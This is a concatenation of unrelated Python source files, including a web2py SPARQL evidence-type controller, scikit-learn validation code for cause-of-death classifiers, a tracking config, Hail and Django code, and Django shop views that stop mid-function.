            if data['ex-ev-mt-question-1'] != 'identification':
                q = q + SPARQL_INVOLVES_CHEMICAL_INHIBITOR
                if data['ex-ev-mt-question-4'] == 'yes' and data['ex-ev-mt-question-2'] == 'unsure':
                    inferenceNotes += " The evidence type ontology requires that CYP450 inhibition studies specify either human tissues or recombinant cell lines."
                if data['ex-ev-mt-question-1'] == 'inhibition':
                    inferenceNotes += " You selected that the mechanistic focus of the experiment is 'inhibition'. The evidence type ontology assumes that the use chemical inhibition applies only to metabolism mechanism identification experiments."
            else:
                q = q + SPARQL_NOT_INVOLVES_ANTIBODY_INHIBITOR + SPARQL_NOT_INVOLVES_CHEMICAL_INHIBITOR
                inferenceNotes += " Questions will be included to help you assess the use of an chemical inhibitor in a metabolic mechanism identification experiment."
        elif data['ex-ev-mt-question-3'] == 'none':
            q = q + SPARQL_NOT_INVOLVES_ANTIBODY_INHIBITOR + SPARQL_NOT_INVOLVES_CHEMICAL_INHIBITOR
    # ---- In vitro transport section ('ex-tp-ev-*' answers) ----
    if not data.get('ex-tp-ev-question-1'):
        print "INFO: skipping in vitro transport questions"
    else:
        q = q + SPARQL_EX_VIVO_DESIGN
        if data['ex-tp-ev-question-1'] == 'inhibition':
            q = q + SPARQL_TRANSPORT_INHIBITION
        elif data['ex-tp-ev-question-1'] == 'identification':
            q = q + SPARQL_TRANSPORT_IDENTIFICATION
        if data['ex-tp-ev-question-2'] == 'cacoTwoCellLines':
            q = q + SPARQL_CACO_2_CELL_LINE
        elif data['ex-tp-ev-question-2'] == 'overExpressedCellLines':
            q = q + SPARQL_OVEREXPRESSED_CELL_LINE
        elif data['ex-tp-ev-question-2'] == 'unsure':
            q = q + SPARQL_NOT_OVEREXPRESSED_CELL_LINE + SPARQL_NOT_CACO_2_CELL_LINE
        if data['ex-tp-ev-question-3'] == 'pGlycoprotein':
            q = q + SPARQL_P_GLYCOPROTEIN
        elif data['ex-tp-ev-question-3'] == 'oatpOnebOne':
            q = q + SPARQL_OATP1B1
            if data['ex-tp-ev-question-2'] == 'cacoTwoCellLines':
                inferenceNotes += " You selected Caco 2 cell lines as the assay type of the experiment. This system is not generally used in experiments involving solute carrier organic anion transporter family members."
        elif data['ex-tp-ev-question-3'] == 'oatpOnebThree':
            q = q + SPARQL_OATP1B3
            if data['ex-tp-ev-question-2'] == 'cacoTwoCellLines':
                inferenceNotes += " You selected Caco 2 cell lines as the assay type of the experiment. This system is not generally used in experiments involving solute carrier organic anion transporter family members"
        #elif data['ex-tp-ev-question-3'] == 'unsure':
        #    q = q + SPARQL_NOT_OATP1B1 + SPARQL_NOT_OATP1B3 + SPARQL_NOT_P_GLYCOPROTEIN
    # close the query with a request for the matching evidence types
    q = q + SPARQL_EV_TYPE + '''
}
'''
    print q
    tstore.setQuery(q)
    tstore.setReturnFormat(JSON)
    qr = tstore.query().convert()
    etRslt = ""
    definition = ""
    uri = ""
    evTypeCnt = 0
    if len(qr["results"]["bindings"]) == 0:
        print "results from sparql query is none "
        etRslt = "No evidence type matching the chosen characteristics."
        inferenceNotes += "Please revise your selections or click the 'Disagree' button below to manually select an evidence type."
    else:
        print "results: %s" % qr
        evTypeData = [{"evItem":x["evItem"]["value"],"label":x["label"]["value"],"evType":x["evType"]["value"],"definition":x["definition"]["value"]} for x in qr["results"]["bindings"]]
        print "evTypeData: %s" % evTypeData
        curEvItem = ""
        evTypeCnt = len(evTypeData)
        for it in evTypeData:
            # rows that share an evidence item are chained with '-->';
            # a new item starts a fresh (unprefixed) segment
            if it["evItem"] == curEvItem:
                etRslt += "-->%s" % it["label"]
                definition += "-->%s" % it["definition"]
                uri += "-->%s" % it["evType"]
            else:
                curEvItem = it["evItem"]
                etRslt += "%s" % it["label"]
                definition += "%s" % it["definition"]
                uri += "%s" % it["evType"]
    if etRslt == "":
        etRslt = "ERROR: Couldn't infer evidence type"
    inferred_evidence_type = (etRslt, definition, inferenceNotes, evTypeCnt, uri)
    return inferred_evidence_type
def getInclusionCriteriaResult():
    """Report the inclusion-criteria result status; currently always succeeds."""
    return True
def agreeInclusionCriteria():
    """Record that the participant agrees with the inferred inclusion criteria.

    Updates the evidence_type row for the current participant/task.
    Relies on web2py controller globals ``db`` and ``session``.
    """
    print '[INFO] form controller agree inclusion criteria...'
    db((db.evidence_type.participant_code == session.part_code) & (db.evidence_type.task_id == session.task_id)).update(is_agree_with_ic_result = True)
def disagreeInclusionCriteria():
    """Record that the participant disagrees with the inferred inclusion criteria.

    Mirror of agreeInclusionCriteria(); sets the flag to False.
    Relies on web2py controller globals ``db`` and ``session``.
    """
    print '[INFO] form controller disagree inclusion criteria...'
    db((db.evidence_type.participant_code == session.part_code) & (db.evidence_type.task_id == session.task_id)).update(is_agree_with_ic_result = False)
# finished current task, redirect to summary page, mark the finished status
def finishTask():
    """Mark the current form and task finished, then redirect to the summary page.

    Persists the participant's disagree comment (from request var 'ic-comment'),
    clears per-task session state, and issues a client-side redirect.
    Relies on web2py globals ``db``, ``session``, ``request``, ``redirect``, ``URL``.
    """
    print '[INFO] form controller finish task...'
    db(db.icl_form.id == session.ic_form_id).update(is_finished = True)
    db((db.evidence_type.participant_code == session.part_code) & (db.evidence_type.task_id == session.task_id)).update(is_finished = True, disagree_comment = request.vars["ic-comment"])
    # clear per-task session state so the next task starts clean
    session.mp_method = None
    session.task_id = None
    session.ic_form_id = None
    redirect(URL(request.application, 'summary','index'), client_side=True)
|
# Python 2 script: given a count ``n`` and ``n`` digits, print the largest
# number divisible by 30 that can be formed from a subset of the digits
# (i.e. digit sum divisible by 3 AND at least one trailing 0), or -1 if
# impossible.  Greedy strategy: drop the fewest/smallest digits needed to
# make the sum divisible by 3.
n = input()
a = [int(x) for x in raw_input().split()]
s = sum(a)
# d: digit -> occurrence count
d = {}
for i in a:
    if i in d:
        d[i] += 1
    else:
        d[i] = 1
if s%3 == 0 and 0 in d and d[0] != n:
    # Sum already divisible by 3 and at least one non-zero digit:
    # use every digit, largest first.
    a.sort(reverse=True)
    res = ""
    for i in a:
        res += str(i)
    print res
else:
    rem = s%3
    if rem == 1:
        # Prefer dropping one digit congruent to 1 (mod 3), smallest first;
        # otherwise drop two digits congruent to 2 (mod 3), smallest pair first.
        if 1 in d:
            d[1] -= 1
            rem = 0
        elif 4 in d:
            d[4] -= 1
            rem = 0
        elif 7 in d:
            d[7] -= 1
            rem = 0
        elif 2 in d and d[2] >= 2:
            d[2] -= 2
            rem = 0
        elif 2 in d and 5 in d and d[2] > 0 and d[5] > 0:
            d[2] -= 1
            d[5] -= 1
            rem = 0
        elif 5 in d and d[5] >= 2:
            d[5] -= 2
            rem = 0
        elif 2 in d and 8 in d and d[2] > 0 and d[8] > 0:
            d[2] -= 1
            d[8] -= 1
            rem = 0
        elif 8 in d and d[8] >= 2:
            d[8] -= 2
            rem = 0
        elif 8 in d and 5 in d and d[8] > 0 and d[5] > 0:
            d[8] -= 1
            d[5] -= 1
            rem = 0
    elif rem == 2:
        # Symmetric case: drop one digit congruent to 2 (mod 3), or two
        # digits congruent to 1 (mod 3).
        if 2 in d:
            d[2] -= 1
            rem = 0
        elif 5 in d:
            d[5] -= 1
            rem = 0
        elif 8 in d:
            d[8] -= 1
            rem = 0
        elif 1 in d and d[1] >= 2:
            d[1] -= 2
            rem = 0
        elif 1 in d and 4 in d and d[1] > 0 and d[4] > 0:
            d[1] -= 1
            d[4] -= 1
            rem = 0
        elif 4 in d and d[4] >= 2:
            d[4] -= 2
            rem = 0
        elif 1 in d and 7 in d and d[1] > 0 and d[7] > 0:
            d[1] -= 1
            d[7] -= 1
            rem = 0
        elif 7 in d and d[7] >= 2:
            d[7] -= 2
            rem = 0
        elif 7 in d and 4 in d and d[7] > 0 and d[4] > 0:
            d[7] -= 1
            d[4] -= 1
            rem = 0
    if rem != 0 or 0 not in d:
        # couldn't fix the remainder, or no 0 available for divisibility by 10
        print -1
    else:
        # rebuild the remaining multiset of digits and emit largest-first
        l = []
        for key in d:
            while d[key] > 0:
                l.append(key)
                d[key] -= 1
        l.sort(reverse=True)
        res = ""
        for i in l:
            res += str(i)
        # only zeros left (or nothing): canonical answer is a single "0"
        if res.count('0') == len(l) or res == "":
            res = "0"
        print res
|
from nbconvert.preprocessors import Preprocessor
from nbformat import NotebookNode
class SkipIgnored(Preprocessor):
    """nbconvert preprocessor that drops cells flagged with ``ipub.ignore``.

    Every cell's ``metadata.ipub`` is normalised to a NotebookNode as a side
    effect, so downstream consumers can rely on the key existing.
    """

    def preprocess(self, nb, resources):
        kept = []
        for cell in nb.cells:
            # ensure metadata.ipub always exists (side effect kept from original)
            meta = cell.metadata.get("ipub", NotebookNode())
            cell.metadata.ipub = meta
            if not meta.get("ignore", False):
                kept.append(cell)
        nb.cells = kept
        return nb, resources
from __future__ import division

import numpy as np
import pandas as pd
from sklearn.dummy import DummyClassifier
from sklearn.exceptions import NotFittedError
from sklearn.model_selection import StratifiedShuffleSplit, LeavePGroupsOut
from sklearn.utils import resample, check_X_y
from sklearn.utils.validation import check_is_fitted

from prep import SITES
from metrics import (
    calc_ccc,
    calc_csmf_accuracy_from_csmf,
    correct_csmf_accuracy
)
class RandomClassifier(DummyClassifier):
    """Classifier to generate predictions uniformly at random.

    This subclasses sklearn.dummy.DummyClassifier and overrides the predict
    method.
    """

    def __init__(self, random_state=None, **kwargs):
        # Pin the Dummy strategy so predictions are uniform over classes.
        self.strategy = 'uniform'
        self.constant = 1
        self.random_state = random_state
        # Accept and store arbitrary extra params (sklearn clone compatibility).
        for arg, val in kwargs.items():
            setattr(self, arg, val)

    def predict(self, X):
        """Perform classification on test X.

        This overrides the default behavior by of Sklearn classifiers by
        returning both individual and population level predictions. This is
        necessary because other classifiers estimate population distributions
        in a manner slightly de-coupled from individual predictions.

        Args:
            X (dataframe): samples by features to test

        Returns:
            tuple:
                * predictions (series): individual level prediction
                * csmf: (series): population level predictions
        """
        # This is a hack to use this classifier to test configurations where
        # the default setup is used: with no prior ``fit()``, predict against
        # the index labels themselves.
        # BUG FIX: ``check_is_fitted`` returns None when fitted and *raises*
        # NotFittedError otherwise, so the original ``if not
        # check_is_fitted(...)`` re-fit on every call and crashed when
        # actually unfitted.  Catch the exception instead.
        try:
            check_is_fitted(self, 'classes_')
        except NotFittedError:
            self.fit(X, X.index)
        pred = super(RandomClassifier, self).predict(X)
        indiv = pd.Series(pred, index=X.index)
        csmf = indiv.value_counts() / len(indiv)
        return indiv, csmf
def prediction_accuracy(clf, X_train, y_train, X_test, y_test,
                        resample_test=True, resample_size=1):
    """Measure prediction accuracy of a classifier.

    Args:
        clf: sklearn-like classifier object. It must implement a fit method
            with the signature ``(X, y) --> self`` and a predict method with
            a signature ``(X) --> (y, csmf)``
        X_train (dataframe): samples by features matrix used for training
        y_train (series): target values used for training
        X_test (dataframe): samples by features matrix used for testing
        y_test (series): target values to compare predictions against
        resample_test (bool): currently unused here; resampling is performed
            by the caller (see ``validate``)
        resample_size (float): currently unused here; see ``validate``

    Returns:
        tuple:
            * preds (dataframe): two column dataframe with actual and predicted
                values for all observations
            * csmfs (dataframe): two column dataframe with actual and predicted
                cause-specific mortality fraction for each cause
            * ccc (dataframe): chance-correct concordance for each cause in one row
            * accuracy (dataframe): summary accuracy measures in one row
    """
    y_pred, csmf_pred = clf.fit(X_train, y_train).predict(X_test)

    # All the outputs should be dataframes which can be concatentated and
    # saved without the index
    preds = pd.concat([y_test, y_pred], axis=1)
    preds.index.name = 'ID'
    preds.columns = ['actual', 'prediction']
    preds.reset_index(inplace=True)

    # Only calculate CCC for real causes. The classifier may predict causes
    # which are not in the set of true causes. This primarily occurs when
    # the classifier is run using default settings and no training or when it
    # isn't properly learning impossible causes.
    ccc = pd.DataFrame([{cause: calc_ccc(cause, y_test, y_pred)
                         for cause in y_test.unique()}])

    # It's possible for some classes predictions not to occur
    # These would result in missingness when aligning the csmf series
    csmf_actual = y_test.value_counts(dropna=False, normalize=True)
    csmf = pd.concat([csmf_actual, csmf_pred], axis=1).fillna(0)
    csmf.index.name = 'cause'
    csmf.columns = ['actual', 'prediction']
    csmf.reset_index(inplace=True)

    csmf_acc = calc_csmf_accuracy_from_csmf(csmf.actual, csmf.prediction)
    cccsmf_acc = correct_csmf_accuracy(csmf_acc)

    # Classifiers without a ``converged_`` attribute are assumed converged.
    converged = int(clf.converged_) if hasattr(clf, 'converged_') else 1

    accuracy = pd.DataFrame([[
        ccc.iloc[0].mean(),
        ccc.iloc[0].median(),
        csmf_acc,
        cccsmf_acc,
        converged,
    ]], columns=['mean_ccc', 'median_ccc', 'csmf_accuracy', 'cccsmf_accuracy',
                 'converged'])

    return preds, csmf, ccc, accuracy
def dirichlet_resample(X, y, n_samples=None, random_state=None):
    """Resample so that the predicted classes follow a dirichlet distribution.

    When using a stratified split strategy for validation the cause
    distribution between the test and train splits are similiar. Resampling the
    test data using a dirichlet distribution provides a cause distribution in
    the test data which is uncorrelated to the cause distribution of the
    training data. This is essential for correctly estimating accuracy at
    the population level across a variety of population. A classifier which
    knows the output distribution may perform well by only predicting the most
    common causes regardless of the predictors. Resampling the test split
    provides a better estimate of out of sample validity. The dirichlet
    distribution is conjugate prior of the multinomial distribution and always
    sums to one, so it is suitable for resampling categorical data.

    Args:
        X (dataframe): samples by features matrix
        y (series): target values
        n_samples (int): number of samples in output. If none this defaults
            to the length of the input
        random_state (int, np.random.RandomState, or None): seed or generator
            used for the dirichlet/multinomial draws and row resampling

    Return:
        tuple:
            * X_new (dataframe): resampled data
            * y_new (series): resampled predictions
    """
    if len(X.index.symmetric_difference(y.index)):
        raise ValueError('X and y do not have matching indices')
    check_X_y(X, y)
    if not n_samples:
        n_samples = len(X)

    # BUG FIX: ``random_state`` was previously accepted but ignored (global
    # numpy state was used), making results irreproducible. Route all
    # randomness through one generator instead.
    if isinstance(random_state, np.random.RandomState):
        rng = random_state
    else:
        rng = np.random.RandomState(random_state)

    causes = np.unique(y)
    n_causes = len(causes)

    # Draw samples from a dirichlet distribution where the alpha value for
    # each cause is the same
    csmf = rng.dirichlet(np.ones(n_causes))

    # To calculate counts for each cause we multiply fractions through by the
    # desired sampled size and round down. We then add counts for the total
    # number of missing observations to achieve exactly the desired size.
    counts = np.vectorize(int)(csmf * n_samples)
    counts = counts + rng.multinomial(n_samples - counts.sum(), csmf)

    X_new = pd.concat([resample(X.loc[y == cause], n_samples=counts[i],
                                random_state=rng)
                       for i, cause in enumerate(causes)])
    y_new = pd.Series(np.repeat(causes, counts), index=X_new.index)
    assert len(X_new) == len(y_new) == n_samples

    return X_new, y_new
def validate(X, y, clf, splits, subset=None, resample_test=True,
             resample_size=1, random_state=None):
    """Measure out of sample accuracy of a classifier.

    Args:
        X: (dataframe) rows are records, columns are features
        y: (series) predictions for each record
        clf: sklearn-like classifier object. It must implement a fit method
            with the signature ``(X, y) --> self`` and a predict method with
            a signature ``(X) --> (y, csmf)``
        splits: iterable of ``(train_index, test_index, split_id)`` tuples;
            ``train_index`` may be None for no-training splits
        subset: (tuple of int) inclusive (start, stop) range of splits to run
        resample_test (bool): resample test data to a dirichlet distribution
        resample_size (float): scalar applied to n of test samples to
            determine the resampled test size
        random_state (int, np.random.RandomState, or None): seed forwarded to
            ``dirichlet_resample``

    Returns:
        (tuple of dataframes): same as ``prediction_accuracy`` for every split
            in ``subset`` with results concatenated and a ``split`` column added.
    """
    output = [[], [], [], []]
    for i, (train_index, test_index, split_id) in enumerate(splits):
        if subset:
            start, stop = subset
            if i < start:
                continue
            if i > stop:
                break
        if train_index is None:
            X_train = None
            y_train = None
        else:
            X_train = X.iloc[train_index]
            y_train = y.iloc[train_index]
        X_test = X.iloc[test_index]
        y_test = y.iloc[test_index]
        if resample_test:
            n_samples = round(resample_size * len(X_test))
            # BUG FIX: forward random_state (previously dropped, so resampling
            # was irreproducible even with a seed).
            X_test, y_test = dirichlet_resample(X_test, y_test, n_samples,
                                                random_state=random_state)
        results = prediction_accuracy(clf, X_train, y_train, X_test, y_test)
        # Use ``j`` here: reusing ``i`` would shadow the split counter above.
        for j, result in enumerate(results):
            result['split'] = split_id
            output[j].append(result)
    return list(map(pd.concat, output))
def out_of_sample_splits(X, y, n_splits, test_size=.25, random_state=None):
    """Yield ``(train_index, test_index, split_id)`` stratified shuffle splits."""
    splitter = StratifiedShuffleSplit(n_splits=n_splits, test_size=test_size,
                                      random_state=random_state)
    for split_id, (train_idx, test_idx) in enumerate(splitter.split(X, y)):
        yield train_idx, test_idx, split_id
def in_sample_splits(X, y, n_splits):
    """Yield ``n_splits`` splits that train and test on the full data."""
    X, y = check_X_y(X, y)
    indices = np.arange(len(y))
    for split_id in range(n_splits):
        yield indices, indices, split_id
def no_training_splits(X, y, n_splits):
    """Yield ``n_splits`` splits with no training data (train index is None)."""
    X, y = check_X_y(X, y)
    indices = np.arange(len(y))
    for split_id in range(n_splits):
        yield None, indices, split_id
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Update Group's Meta options: default ordering and custom permissions.

    AlterModelOptions only changes Django's model state; it emits no
    database schema changes.
    """

    dependencies = [
        ('groups', '0003_add_foreign_keys'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='group',
            options={'ordering': ['-featured', '-is_national', 'group__name'], 'permissions': (('can_edit_any_group', 'Can edit any group.'), ('can_edit_group_category', "Can change a group's category."), ('can_edit_group_featured', "Can change a group's featured status."))},
        ),
    ]
|
from .matchresult import MatchResult
from .predthread import PredictionThread
__all__ = [MatchResult, PredictionThread] |
from hail.expr.expressions import *
from hail.expr.expressions.expression_typecheck import *
from hail.expr.types import *
from hail.typecheck import *
from hail.expr.functions import _func
@typecheck(ac=expr_int32, an=expr_int32, ci=expr_float64)
def filtering_allele_frequency(ac, an, ci) -> Float64Expression:
    """Compute a filtering allele frequency for `ac` and `an` at confidence `ci`.

    The filtering allele frequency is the highest true population allele
    frequency for which the upper bound of the `ci` confidence interval of the
    allele count (modelled as Poisson) remains below the variant's observed
    `ac` in the reference sample, given an allele number `an`.

    This defines a "filtering AF": the threshold disease-specific "maximum
    credible AF" at or below which the disease could not plausibly be caused
    by the variant. A variant whose filtering AF is at or above the maximum
    credible AF for the disease under consideration should be filtered out; a
    variant below it remains a candidate. The filtering AF itself is
    disease-agnostic — apply it to any disease by comparing against a
    user-supplied disease-specific maximum credible AF.

    For more details, see: `Whiffin et al., 2017 <https://www.nature.com/articles/gim201726>`__

    Parameters
    ----------
    ac : int or :class:`.Expression` of type :py:data:`.tint32`
    an : int or :class:`.Expression` of type :py:data:`.tint32`
    ci : float or :class:`.Expression` of type :py:data:`.tfloat64`

    Returns
    -------
    :class:`.Expression` of type :py:data:`.tfloat64`
    """
    return _func("filtering_allele_frequency", tfloat64, ac, an, ci)
#!/usr/bin/env python
# -*- coding:UTF-8 -*-
import os.path as osp
from easydict import EasyDict as edict
import math
__C = edict()
# Consumers can get config by: import config as cfg
cfg = __C
# Selected object
__C.TRACK_OBJ = 'Car' # Pedestrian/Cyclist
# Crop geometry (metres) and voxelisation for the tracked template and the
# search scene.  Cars/vans use a crop twice as large (and voxels twice as
# coarse) as pedestrians/cyclists, so each class yields the same grid sizes.
if __C.TRACK_OBJ == 'Car' or __C.TRACK_OBJ == 'Van':
    __C.TEMPLATE_Z_MIN = -3.2
    __C.TEMPLATE_Z_MAX = 3.2
    __C.TEMPLATE_Y_MIN = -5.12
    __C.TEMPLATE_Y_MAX = 5.12
    __C.TEMPLATE_X_MIN = -3.2
    __C.TEMPLATE_X_MAX = 3.2
    __C.SCENE_Z_MIN = -5.12
    __C.SCENE_Z_MAX = 5.12
    __C.SCENE_Y_MIN = -5.12
    __C.SCENE_Y_MAX = 5.12
    __C.SCENE_X_MIN = -5.12
    __C.SCENE_X_MAX = 5.12
    __C.VOXEL_Z_SIZE = 0.16
    __C.VOXEL_Y_SIZE = 10.24
    __C.VOXEL_X_SIZE = 0.16
    __C.VOXEL_POINT_COUNT = 35
else:
    __C.TEMPLATE_Z_MIN = -1.6
    __C.TEMPLATE_Z_MAX = 1.6
    __C.TEMPLATE_Y_MIN = -2.56
    __C.TEMPLATE_Y_MAX = 2.56
    __C.TEMPLATE_X_MIN = -1.6
    __C.TEMPLATE_X_MAX = 1.6
    __C.SCENE_Z_MIN = -2.56
    __C.SCENE_Z_MAX = 2.56
    __C.SCENE_Y_MIN = -2.56
    __C.SCENE_Y_MAX = 2.56
    __C.SCENE_X_MIN = -2.56
    __C.SCENE_X_MAX = 2.56
    __C.VOXEL_Z_SIZE = 0.08
    __C.VOXEL_Y_SIZE = 5.12
    __C.VOXEL_X_SIZE = 0.08
    __C.VOXEL_POINT_COUNT = 45

# Derived grid dimensions.  These formulas were duplicated verbatim in both
# branches above; they are hoisted here so they are defined exactly once
# (resulting values are unchanged for every object class).
__C.TEMPLATE_INPUT_DEPTH = int((__C.TEMPLATE_Z_MAX - __C.TEMPLATE_Z_MIN) / __C.VOXEL_Z_SIZE)
__C.TEMPLATE_INPUT_HEIGHT = int((__C.TEMPLATE_Y_MAX - __C.TEMPLATE_Y_MIN) / __C.VOXEL_Y_SIZE)
__C.TEMPLATE_INPUT_WIDTH = int((__C.TEMPLATE_X_MAX - __C.TEMPLATE_X_MIN) / __C.VOXEL_X_SIZE)
__C.SCENE_INPUT_DEPTH = int((__C.SCENE_Z_MAX - __C.SCENE_Z_MIN) / __C.VOXEL_Z_SIZE)
__C.SCENE_INPUT_HEIGHT = int((__C.SCENE_Y_MAX - __C.SCENE_Y_MIN) / __C.VOXEL_Y_SIZE)
__C.SCENE_INPUT_WIDTH = int((__C.SCENE_X_MAX - __C.SCENE_X_MIN) / __C.VOXEL_X_SIZE)
# Correlation output size: scene grid minus template grid.
__C.INPUT_WIDTH = int(__C.SCENE_INPUT_WIDTH - __C.TEMPLATE_INPUT_WIDTH)
__C.INPUT_HEIGHT = int(__C.SCENE_INPUT_HEIGHT - __C.TEMPLATE_INPUT_HEIGHT)
__C.INPUT_DEPTH = int(__C.SCENE_INPUT_DEPTH - __C.TEMPLATE_INPUT_DEPTH)
__C.FEATURE_RATIO = 2
__C.FEATURE_WIDTH = int(__C.INPUT_WIDTH / __C.FEATURE_RATIO) + 1
__C.FEATURE_HEIGHT = int(__C.INPUT_HEIGHT / __C.FEATURE_RATIO) + 1
__C.FEATURE_DEPTH = int(__C.INPUT_DEPTH / __C.FEATURE_RATIO) + 1
# Anchor box dimensions (L/W/H) and RPN IoU thresholds per object class.
# 'Van' reuses the 'Car' anchor settings.
if __C.TRACK_OBJ in ('Car', 'Van'):
    # Car anchor
    __C.ANCHOR_L, __C.ANCHOR_W, __C.ANCHOR_H = 3.9, 1.6, 1.56
    __C.ANCHOR_Z = 0
    __C.RPN_POS_IOU = 0.6
    __C.RPN_NEG_IOU = 0.45
    __C.SEARCH_AREA = 2.0
elif __C.TRACK_OBJ == 'Pedestrian':
    # Pedestrian anchor
    __C.ANCHOR_L, __C.ANCHOR_W, __C.ANCHOR_H = 0.8, 0.6, 1.73
    __C.ANCHOR_Z = 0
    __C.RPN_POS_IOU = 0.7
    __C.RPN_NEG_IOU = 0.25
    __C.SEARCH_AREA = 0.3
elif __C.TRACK_OBJ == 'Cyclist':
    # Cyclist anchor
    __C.ANCHOR_L, __C.ANCHOR_W, __C.ANCHOR_H = 1.76, 0.6, 1.73
    __C.ANCHOR_Z = 0
    __C.RPN_POS_IOU = 0.65
    __C.RPN_NEG_IOU = 0.35
    __C.SEARCH_AREA = 0.6
if __name__ == '__main__':
    # Smoke test only.  NOTE: updating TRACK_OBJ here does NOT re-run the
    # conditional blocks above, so all derived values keep the settings
    # chosen at import time.
    cfg.update({'TRACK_OBJ': 'aaa'})
    print('__C.TRACK = ' + __C.TRACK_OBJ)
|
import nose.tools as nt
import logging
from topik.fileio.in_elastic import read_elastic
from topik.fileio.project import TopikProject
from topik.fileio.tests import test_data_path
from ._solutions import solution_elastic
from elasticsearch.exceptions import ConnectionError
from nose.plugins.skip import SkipTest
INDEX = "test_elastic"
# make logging quiet during testing, to keep Travis CI logs short.
logging.basicConfig()
logging.getLogger('elasticsearch').setLevel(logging.ERROR)
logging.getLogger('urllib3').setLevel(logging.ERROR)
def test_elastic_import():
    """Round-trip test: import a JSON stream into Elasticsearch and read it back.

    Skips (via nose SkipTest) when no Elasticsearch server is reachable on
    localhost.  Verifies that a known solution abstract appears in the
    re-read corpus, then deletes the test index.
    """
    output_args = {'source': 'localhost',
                   'index': INDEX,
                   'content_field': 'abstract'}
    # import data from file into known elastic server
    project = TopikProject("test_project", output_type='ElasticSearchOutput',
                           output_args=output_args)
    try:
        project.read_input('{}/test_data_json_stream.json'.format(
            test_data_path), content_field="abstract")#,
            #output_type=elastic.ElasticSearchOutput.class_key(),
            #output_args=output_args, synchronous_wait=30)
    except ConnectionError:
        raise SkipTest("Skipping Elasticsearch test - elasticsearch not running")
    loaded_corpus = read_elastic("localhost", index=INDEX)
    solution_found = False
    # linear scan: any document whose abstract matches the known solution
    for doc in list(iter(loaded_corpus)):
        if solution_elastic == doc['abstract']:
            solution_found = True
            break
    nt.assert_true(solution_found)

    # tear-down
    # local import keeps the elasticsearch client out of module import time
    from elasticsearch import Elasticsearch
    instance = Elasticsearch("localhost")
    if instance.indices.exists(INDEX):
        instance.indices.delete(INDEX)
|
import re
from django.contrib.auth import login
from apps.shop.forms import PaymentChoiceForm
from django.db.models import query
from django.shortcuts import get_object_or_404, render, redirect
from django.http.response import HttpResponse, JsonResponse
from django.http.request import HttpRequest
from django.views.generic import ListView, DetailView, View
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.auth.mixins import LoginRequiredMixin
from django.conf import settings
# Create your views here.
from apps.store.models import Banner, Payment, Product, Category, Order, OrderItem, Address
from apps.store.forms import AddressForm
from . import cookie_store
class HomePage(ListView):
    """Landing page: a handful of categories plus uncategorised banners."""

    model = Category
    context_object_name = "categories"
    template_name = "shop/homepage.html"

    def get_queryset(self):
        # only the first seven categories appear on the landing page
        return Category.objects.all()[:7]

    def get_context_data(self, *args, **kwargs):
        context = super().get_context_data()
        context.update({
            "banners": Banner.objects.filter(category=None)[:5],
            "all_products_count": Product.objects.all().count(),
        })
        return context
class ProductListView(ListView):
    """Paginated catalogue with optional text search and category filter."""

    model = Product
    paginate_by = 12
    context_object_name = "products"
    template_name = "shop/shop.html"
    current_category = None
    search_query = None

    def get_queryset(self, *args, **kwargs):
        products = super().get_queryset()
        self.search_query = self.request.GET.get("search", None)
        if self.search_query:
            products = products.filter(name__icontains=self.search_query)
        pk = self.kwargs.get("category_pk")
        if pk:
            self.current_category = get_object_or_404(Category, pk=pk)
            products = products.filter(category=self.current_category)
        return products

    def get_context_data(self, *args, **kwargs):
        context = super().get_context_data(*args, **kwargs)
        context.update({
            "categories": Category.objects.all(),
            "current_category": self.current_category,
            "all_products_count": Product.objects.all().count(),
            "search_query": self.search_query,
        })
        return context
class ProductDetailView(DetailView):
    """Single-product page; records the visit in the recently-viewed store."""

    model = Product
    context_object_name = "product"
    template_name = "shop/product.html"

    def get_context_data(self, **kwargs):
        context = super().get_context_data(**kwargs)
        # side effect: remember this product in the visitor's recent list
        cookie_store.RecentList(self.request).add(self.get_object())
        return context
@login_required
def add_product_to_order(request: HttpRequest, product_pk: int) -> HttpResponse:
    """Add ``quantity`` units of a product to the user's open order, then show the cart."""
    order: Order = Order.objects.get_or_create(ordered=False, user=request.user)[0]
    qty = int(request.GET.get("quantity", 1))
    product: Product = get_object_or_404(Product, pk=product_pk)
    # bump the existing line item if the product is already in the cart
    item = OrderItem.objects.filter(order=order, product=product).first()
    if item is not None:
        item.quantity += qty
        item.save()
    else:
        OrderItem.objects.create(order=order, product=product, quantity=qty)
    messages.success(request, f"Product '{product.name}' has been added to cart.")
    return redirect("shop:cart")
@login_required
def add_product_to_cart_json(request: HttpRequest, product_pk: int):
    """AJAX endpoint: adjust a cart line's quantity and return it as JSON."""
    qty = int(request.GET.get("quantity", 1))
    order = Order.objects.get_or_create(ordered=False, user=request.user)[0]
    product = get_object_or_404(Product, pk=product_pk)
    item = OrderItem.objects.filter(order=order, product=product).first()
    if item is not None:
        item.quantity += qty
        if item.quantity == 0:
            # drop the row entirely once the quantity reaches zero
            item.delete()
        else:
            item.save()
    else:
        item = OrderItem.objects.create(order=order, product=product, quantity=qty)
    return JsonResponse(
        {"quantity": item.quantity, "total": item.get_total_price()}
    )
@login_required
def cart_view(request: HttpRequest):
    """Render the user's open (not yet placed) order as the shopping cart."""
    current_order, _created = Order.objects.get_or_create(ordered=False, user=request.user)
    return render(request, "shop/cart.html", {"order": current_order})
class CheckOut(LoginRequiredMixin, View):
    """Collect a shipping address for the open order.

    GET renders an empty :class:`AddressForm`; when an ``address_pk`` URL
    kwarg is present it delegates straight to POST to reuse a saved address.
    POST attaches either the referenced saved address or a newly submitted
    one to the order, then redirects to payment-method selection.
    """

    def get(self, request: HttpRequest, *args, **kwargs):
        # A pre-selected saved address skips the form entirely.
        if self.kwargs.get("address_pk"):
            return self.post(request, *args, **kwargs)
        order, _ = Order.objects.get_or_create(ordered=False, user=request.user)
        if order.order_items.count() < 1:
            messages.error(request, "Sorry you do not have any items in your order.")
            return redirect("shop:product-list")
        address_form = AddressForm()
        return render(
            request,
            "shop/checkout.html",
            {"address_form": address_form, "order": order},
        )

    def post(self, request: HttpRequest, *args, **kwargs):
        order, _ = Order.objects.get_or_create(ordered=False, user=request.user)
        if order.order_items.count() < 1:
            messages.error(request, "Sorry you do not have any items in your order.")
            return redirect("shop:product-list")
        if self.kwargs.get("address_pk"):
            address_qs = Address.objects.filter(
                user=request.user, pk=int(self.kwargs.get("address_pk"))
            )
            if address_qs.exists():
                address = address_qs.first()
            else:
